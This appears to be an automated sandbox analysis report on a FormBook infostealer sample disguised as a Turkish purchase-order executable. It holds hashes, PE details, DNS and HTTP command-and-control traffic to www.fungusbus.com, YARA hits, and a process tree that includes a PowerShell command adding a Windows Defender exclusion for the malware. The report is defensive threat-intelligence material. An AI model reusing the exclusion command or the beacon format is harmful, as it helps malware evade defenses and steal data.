                    parkingpage.namecheap.com | 1R50C5E13BU8I.exe | Get hash | malicious | FormBook | Browse | 91.195.240.19
                    parkingpage.namecheap.com | Fiyat ARH-4532817-PO 45328174563.exe | Get hash | malicious | FormBook | Browse | 91.195.240.19
                    parkingpage.namecheap.com | Fiyat ARH-4532817-PO 45328174563.exe | Get hash | malicious | FormBook | Browse | 91.195.240.19
                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                    SEDO-ASDE | factura.exe | Get hash | malicious | FormBook | Browse | 91.195.240.12
                    SEDO-ASDE | Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Get hash | malicious | FormBook | Browse | 91.195.240.19
                    SEDO-ASDE | Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe | Get hash | malicious | FormBook | Browse | 91.195.240.19
                    SEDO-ASDE | Att00173994.exe | Get hash | malicious | FormBook | Browse | 91.195.240.19
                    SEDO-ASDE | disjR92Xrrnc3aZ.exe | Get hash | malicious | FormBook | Browse | 91.195.240.19
                    SEDO-ASDE | Attendance list.exe | Get hash | malicious | FormBook | Browse | 91.195.240.19
                    SEDO-ASDE | 8hd98EhtIFcYkb8.exe | Get hash | malicious | FormBook | Browse | 91.195.240.123
                    SEDO-ASDE | Bn0VHqJWSS.exe | Get hash | malicious | Unknown | Browse | 91.195.240.117
                    SEDO-ASDE | gZVfHNoTGQ.exe | Get hash | malicious | Unknown | Browse | 91.195.240.117
                    SEDO-ASDE | Bn0VHqJWSS.exe | Get hash | malicious | Unknown | Browse | 91.195.240.117
                    No context
                    No context
                    Process:C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):1216
                    Entropy (8bit):5.34331486778365
                    Encrypted:false
                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1172
                    Entropy (8bit):5.3550249375369265
                    Encrypted:false
                    SSDEEP:24:3OWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:eWSU4xympjms4RIoU99tK8NDv
                    MD5:F5C607E507119C024A8457EB53A4EACA
                    SHA1:E12BA3AFFE22D4699D53BBBFB38281EB20C79523
                    SHA-256:B5C5E419F4854F669A4DF47860787886BC46FAC9C6DC97E39A9F118E79F55AEF
                    SHA-512:1FA5B1E2F4850B41ED89237D6A2A5FBB7A04101B21362F118D39A4C9891F00F605AA49651DD1B5B37CFA954BD7A08A53F00F7ECAE4966ADA2207AD2DF995B597
                    Malicious:false
                    Reputation:low
                    Process:C:\Windows\SysWOW64\shutdown.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.1221538113908904
                    Encrypted:false
                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                    MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                    SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                    SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                    SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):7.951626051712124
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    • Win32 Executable (generic) a (10002005/4) 49.75%
                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                    • Windows Screen Saver (13104/52) 0.07%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    File name:03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
                    File size:989'696 bytes
                    MD5:22f3e4a1d074aec6cbc7314efd0f53e0
                    SHA1:169c6970364d5f8b75efe451a38d7a91b1b47f6b
                    SHA256:2d6eb4f35570a71972008b6f1e3572aaab6d0ef97e19c42dbc68aeb57b670964
                    SHA512:81038105db28db336e2446d4210e76dbcc578640cfe72e24e85355518a3eb23498c99a9a15a311e4e2ba31cd5a69f1db0d0d723e255139a98821aaa73b8b7907
                    SSDEEP:24576:6bkynDESWY4vQ+P3zR+L1CMCowXu/3mmo3AMF9wfHrh:6I8DE/7vPcL1HCowX8mmo3A9jh
                    TLSH:2A25230325A8CB60C87E9FFD8579465013B0BC2D1971D59E6EC6B4FFA9B1B90402AB37
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...............0......f........... ........@.. ....................................@................................
                    Icon Hash:66666667e69c310e
                    Entrypoint:0x4ed1e2
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Time Stamp:0xB95FCE0F [Sat Jul 21 02:33:51 2068 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                    Instruction
                    jmp dword ptr [00402000h]
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0xed190 | 0x4f | .text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xee000 | 0x6400 | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf6000 | 0xc | .reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0xeb470 | 0x70 | .text
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    .text | 0x2000 | 0xeb1e8 | 0xeb200 | 3e2d25cc67857f8604400642c88dde9e | False | 0.9724672713981924 | data | 7.978509985045748 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rsrc | 0xee000 | 0x6400 | 0x6400 | 60688ca311bbe7ec82333c57930e69d2 | False | 0.395703125 | data | 5.148026062429349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc | 0xf6000 | 0xc | 0x200 | af87c6d498fa46fabfae3fe9292e52f5 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                    RT_ICON | 0xee1e0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | | | 0.2701612903225806
                    RT_ICON | 0xee4d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | | | 0.4966216216216216
                    RT_ICON | 0xee610 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.5439765458422174
                    RT_ICON | 0xef4c8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.6656137184115524
                    RT_ICON | 0xefd80 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5021676300578035
                    RT_ICON | 0xf02f8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.3157676348547718
                    RT_ICON | 0xf28b0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.4090056285178236
                    RT_ICON | 0xf3968 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.5859929078014184
                    RT_GROUP_ICON | 0xf3de0 | 0x76 | data | | | 0.6440677966101694
                    RT_VERSION | 0xf3e68 | 0x398 | OpenPGP Public Key | | | 0.4217391304347826
                    RT_MANIFEST | 0xf4210 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                    DLL | Import
                    mscoree.dll | _CorExeMain
                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                    07/03/24-17:52:48.068224 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49715 | 80 | 192.168.2.9 | 91.195.240.19
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Jul 3, 2024 17:52:48.055138111 CEST | 49715 | 80 | 192.168.2.9 | 91.195.240.19
                    Jul 3, 2024 17:52:48.060219049 CEST | 80 | 49715 | 91.195.240.19 | 192.168.2.9
                    Jul 3, 2024 17:52:48.060352087 CEST | 49715 | 80 | 192.168.2.9 | 91.195.240.19
                    Jul 3, 2024 17:52:48.068223953 CEST | 49715 | 80 | 192.168.2.9 | 91.195.240.19
                    Jul 3, 2024 17:52:48.073056936 CEST | 80 | 49715 | 91.195.240.19 | 192.168.2.9
                    Jul 3, 2024 17:52:48.747432947 CEST | 80 | 49715 | 91.195.240.19 | 192.168.2.9
                    Jul 3, 2024 17:52:48.748835087 CEST | 80 | 49715 | 91.195.240.19 | 192.168.2.9
                    Jul 3, 2024 17:52:48.748923063 CEST | 49715 | 80 | 192.168.2.9 | 91.195.240.19
                    Jul 3, 2024 17:52:48.780905008 CEST | 49715 | 80 | 192.168.2.9 | 91.195.240.19
                    Jul 3, 2024 17:52:48.785737991 CEST | 80 | 49715 | 91.195.240.19 | 192.168.2.9
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Jul 3, 2024 17:52:37.488508940 CEST | 64577 | 53 | 192.168.2.9 | 1.1.1.1
                    Jul 3, 2024 17:52:37.501432896 CEST | 53 | 64577 | 1.1.1.1 | 192.168.2.9
                    Jul 3, 2024 17:52:42.510727882 CEST | 51628 | 53 | 192.168.2.9 | 1.1.1.1
                    Jul 3, 2024 17:52:42.814138889 CEST | 53 | 51628 | 1.1.1.1 | 192.168.2.9
                    Jul 3, 2024 17:52:47.825834990 CEST | 59463 | 53 | 192.168.2.9 | 1.1.1.1
                    Jul 3, 2024 17:52:48.043201923 CEST | 53 | 59463 | 1.1.1.1 | 192.168.2.9
                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                    Jul 3, 2024 17:52:37.488508940 CEST | 192.168.2.9 | 1.1.1.1 | 0xf3ad | Standard query (0) | www.betful.site | A (IP address) | IN (0x0001) | false
                    Jul 3, 2024 17:52:42.510727882 CEST | 192.168.2.9 | 1.1.1.1 | 0xbebc | Standard query (0) | www.deviexp.com | A (IP address) | IN (0x0001) | false
                    Jul 3, 2024 17:52:47.825834990 CEST | 192.168.2.9 | 1.1.1.1 | 0xde1b | Standard query (0) | www.fungusbus.com | A (IP address) | IN (0x0001) | false
                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                    Jul 3, 2024 17:52:37.501432896 CEST | 1.1.1.1 | 192.168.2.9 | 0xf3ad | Name error (3) | www.betful.site | none | none | A (IP address) | IN (0x0001) | false
                    Jul 3, 2024 17:52:42.814138889 CEST | 1.1.1.1 | 192.168.2.9 | 0xbebc | Server failure (2) | www.deviexp.com | none | none | A (IP address) | IN (0x0001) | false
                    Jul 3, 2024 17:52:48.043201923 CEST | 1.1.1.1 | 192.168.2.9 | 0xde1b | No error (0) | www.fungusbus.com | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001) | false
                    Jul 3, 2024 17:52:48.043201923 CEST | 1.1.1.1 | 192.168.2.9 | 0xde1b | No error (0) | parkingpage.namecheap.com | | 91.195.240.19 | A (IP address) | IN (0x0001) | false
                    • www.fungusbus.com
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.9 | 49715 | 91.195.240.19 | 80 | 6492 | C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 3, 2024 17:52:48.068223953 CEST | 480 | OUT | GET /ucdm/?j2=EKdombQUikql/e8x5w/b0WRCZZ7GjewvGt5yqJ62oMuwgaHfKWbffkwAJSwjzlHKlyNbdgTciiNebF1Tnxx1ssE7dAszzRsyY0LYOFUjrmAhIYA2gw==&NbL=5XSdkb2PqtnPh8PP HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Host: www.fungusbus.com
                    Connection: close
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2483.0 Safari/537.36
                    Jul 3, 2024 17:52:48.747432947 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                    content-length: 93
                    cache-control: no-cache
                    content-type: text/html
                    connection: close
                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>

                    Target ID:0
                    Start time:11:50:54
                    Start date:03/07/2024
                    Path:C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe"
                    Imagebase:0x930000
                    File size:989'696 bytes
                    MD5 hash:22F3E4A1D074AEC6CBC7314EFD0F53E0
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Target ID:3
                    Start time:11:50:55
                    Start date:03/07/2024
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe"
                    Imagebase:0xf30000
                    File size:433'152 bytes
                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:4
                    Start time:11:50:55
                    Start date:03/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff70f010000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:5
                    Start time:11:50:55
                    Start date:03/07/2024
                    Path:C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe"
                    Imagebase:0xb90000
                    File size:989'696 bytes
                    MD5 hash:22F3E4A1D074AEC6CBC7314EFD0F53E0
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2214051577.0000000001250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2214051577.0000000001250000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2215409822.0000000001AF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2215409822.0000000001AF0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:low
                    Has exited:true

                    Target ID:12
                    Start time:11:52:17
                    Start date:03/07/2024
                    Path:C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe"
                    Imagebase:0xea0000
                    File size:140'800 bytes
                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    Target ID:13
                    Start time:11:52:18
                    Start date:03/07/2024
                    Path:C:\Windows\SysWOW64\shutdown.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\SysWOW64\shutdown.exe"
                    Imagebase:0xb00000
                    File size:23'552 bytes
                    MD5 hash:FCDE5AF99B82AE6137FB90C7571D40C3
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2563757906.0000000003700000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2563757906.0000000003700000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2563650828.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2563650828.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    Reputation:moderate
                    Has exited:false

                    Target ID:14
                    Start time:11:52:31
                    Start date:03/07/2024
                    Path:C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe"
                    Imagebase:0xea0000
                    File size:140'800 bytes
                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2563222127.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.2563222127.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    Target ID:16
                    Start time:11:52:52
                    Start date:03/07/2024
                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Imagebase:0x7ff73feb0000
                    File size:676'768 bytes
                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                      Execution Graph

                      Execution Coverage:10.9%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:303
                      Total number of Limit Nodes:9
41705->41723 41728 5362d88 41705->41728 41709 5361aa8 41708->41709 41711 5362818 2 API calls 41709->41711 41712 5362808 2 API calls 41709->41712 41710 5361aef 41710->41698 41711->41710 41712->41710 41714 5361ace 41713->41714 41716 5362818 2 API calls 41714->41716 41717 5362808 2 API calls 41714->41717 41715 5361aef 41715->41698 41716->41715 41717->41715 41719 5362818 41718->41719 41720 5362877 41719->41720 41721 5362da8 2 API calls 41719->41721 41722 5362d88 2 API calls 41719->41722 41721->41720 41722->41720 41725 5362dbc 41723->41725 41724 5362e48 41724->41704 41733 5362e60 41725->41733 41736 5362e50 41725->41736 41730 5362dbc 41728->41730 41729 5362e48 41729->41704 41731 5362e60 2 API calls 41730->41731 41732 5362e50 2 API calls 41730->41732 41731->41729 41732->41729 41734 5362e71 41733->41734 41740 5364022 41733->41740 41734->41724 41737 5362e60 41736->41737 41738 5362e71 41737->41738 41739 5364022 2 API calls 41737->41739 41738->41724 41739->41738 41744 5364050 41740->41744 41748 5364040 41740->41748 41741 536403a 41741->41734 41745 5364092 41744->41745 41747 5364099 41744->41747 41746 53640ea CallWindowProcW 41745->41746 41745->41747 41746->41747 41747->41741 41749 5364050 41748->41749 41750 53640ea CallWindowProcW 41749->41750 41751 5364099 41749->41751 41750->41751 41751->41741 41752 2cd4da0 41753 2cd4f2b 41752->41753 41755 2cd4dc6 41752->41755 41755->41753 41756 2cd316c 41755->41756 41757 2cd5020 PostMessageW 41756->41757 41758 2cd508c 41757->41758 41758->41755 41759 1054668 41760 105467a 41759->41760 41761 1054686 41760->41761 41765 1054779 41760->41765 41770 1054218 41761->41770 41763 10546a5 41766 105479d 41765->41766 41774 1054878 41766->41774 41778 1054888 41766->41778 41771 1054223 41770->41771 41786 1055c6c 41771->41786 41773 1057048 41773->41763 41776 1054882 41774->41776 41775 105498c 41775->41775 41776->41775 41782 10544e0 41776->41782 41780 10548af 41778->41780 41779 105498c 41780->41779 41781 10544e0 CreateActCtxA 41780->41781 41781->41779 41783 
1055918 CreateActCtxA 41782->41783 41785 10559db 41783->41785 41785->41785 41787 1055c77 41786->41787 41790 1055c8c 41787->41790 41789 10570ed 41789->41773 41791 1055c97 41790->41791 41794 1055cbc 41791->41794 41793 10571c2 41793->41789 41795 1055cc7 41794->41795 41796 1055cec 2 API calls 41795->41796 41797 10572c5 41796->41797 41797->41793 42005 105d438 42006 105d47e 42005->42006 42010 105d608 42006->42010 42013 105d618 42006->42013 42007 105d56b 42016 105b790 42010->42016 42014 105d646 42013->42014 42015 105b790 DuplicateHandle 42013->42015 42014->42007 42015->42014 42017 105d680 DuplicateHandle 42016->42017 42018 105d646 42017->42018 42018->42007
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: !Y3E
                      • API String ID: 0-2826621527
                      • Opcode ID: 2177c1c1d63f02c9df15040a47d274e12a75e423588282eb77c03dd9b118527c
                      • Instruction ID: 8f2ab83eb7974e0bad519b12e169c252987f5e115141dae2cda9a38c359f1092
                      • Opcode Fuzzy Hash: 2177c1c1d63f02c9df15040a47d274e12a75e423588282eb77c03dd9b118527c
                      • Instruction Fuzzy Hash: 0FA18E74B20209CFDB44DBB5D95576EB6F2BF88700F218429E906EB3A5DE74DC018B40
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: T(z
                      • API String ID: 0-3184255237
                      • Opcode ID: 7ce36984d82ab9ccf82731a39123227570e42be9080a821550d673ed58499653
                      • Instruction ID: 4ac2fd4d72468cdb7ebaf0b88fb5ded376dccea8b6c61f128e834a29de5ecca1
                      • Opcode Fuzzy Hash: 7ce36984d82ab9ccf82731a39123227570e42be9080a821550d673ed58499653
                      • Instruction Fuzzy Hash: D94129B6F34208CBDB088AB589517AFF6B7EBC9600F10C436D602BB388CA708D418791
                      Strings
                      Memory Dump Source
